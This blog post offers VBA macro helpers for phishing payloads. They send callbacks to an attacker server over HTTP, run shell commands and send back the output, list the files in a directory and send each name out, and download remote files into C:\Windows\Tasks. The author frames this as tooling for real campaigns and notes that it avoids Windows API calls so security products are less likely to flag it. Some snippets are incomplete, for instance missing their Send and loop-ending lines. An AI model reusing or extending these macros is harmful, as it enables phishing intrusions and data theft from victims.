Back to home

Don't Go Phishing Blind, Watch While RunTime

Raise your hand if you crafted well your payload and the payload worked well in your lab machines but in the real scenario you’re not receiving the callback! I guess all of us at some point have experienced this.

To solve this I wrote a simple and yet effective set of functions that allow us to see what going on while the runtime of our script.

The first function/subroutine, which I called hello simply sends an GET request to a specified server.

Sub Hello(message)
	On Error GoTo Done
	Dim MyRequest As Object
	Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
	MyRequest.Open "GET", _
	"" & message
	' Send Request.
	Set MyRequest = Nothing
		Exit Sub
End Sub

This is the main important one, since we are relying on the HTTP protocol to call home after executing an action.

The second important one is ShellRun, this function run a system command and returns the captured output of the command.

Function ShellRun(sCmd As String) As String
	'Run a shell command, returning the output as a string
	Dim oShell As Object
	Set oShell = CreateObject("WScript.Shell")

	'run command
	Dim oExec As Object
	Dim oOutput As Object
	Set oExec = oShell.Exec(sCmd)
	Set oOutput = oExec.StdOut

	'handle the results as they are written to and read from the StdOut object
	Dim s As String
	Dim sLine As String
	While Not oOutput.AtEndOfStream
		sLine = oOutput.ReadLine
		If sLine <> "" Then s = s & sLine & vbCrLf

	ShellRun = s
End Function

In conjunction with Hello, this gives us a visibility of what is going on while the runtime of our phishing script.

Hello (ShellRun("ping"))


One of the other helpers, I wrote is LoopThroughFiles() this print the content of the provider directory.

Sub LoopThroughFiles(path)
	On Error GoTo Done
	Dim oFSO As Object
	Dim oFolder As Object
	Dim oFile As Object
	Dim i As Integer

	Set oFSO = CreateObject("Scripting.FileSystemObject")
	Set oFolder = oFSO.GetFolder(path)

	For Each oFile In oFolder.Files
	Hello (oFile.Name)
	i = i + 1
	Next oFile
		Exit Sub
End Sub

The subroutine relies on Hello subroutine, this could be used as shown below:

LoopThroughFiles ("C:\Windows\Tasks")

I will finish this post with an extra subroutine that download text files, no binary files.

Sub WantMe(pie)
	Dim myURL As String
	myURL = "" & pie

	Dim WinHttpReq As Object
	Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
	WinHttpReq.Open "GET", myURL, False, Null, Null

	If WinHttpReq.Status = 200 Then
		Set oStream = CreateObject("ADODB.Stream")
		oStream.Type = 1
		oStream.Write WinHttpReq.responseBody
		oStream.SaveToFile "C:\Windows\Tasks\" & pie, 2 ' 1 = no overwrite, 2 = overwrite
	End If
End Sub

Nothing special really here, just a set of function helpers to facilitate things, if you noticed we have not used native Windows API and that’s for a reason and the reason for that is portability of the code (few changes) when porting it VBS/HTA, also using native Windows API in Macro could be treated as a red flag by a security product.

Thanks for ready!


Please feel free to ping me on X @tahadraidia.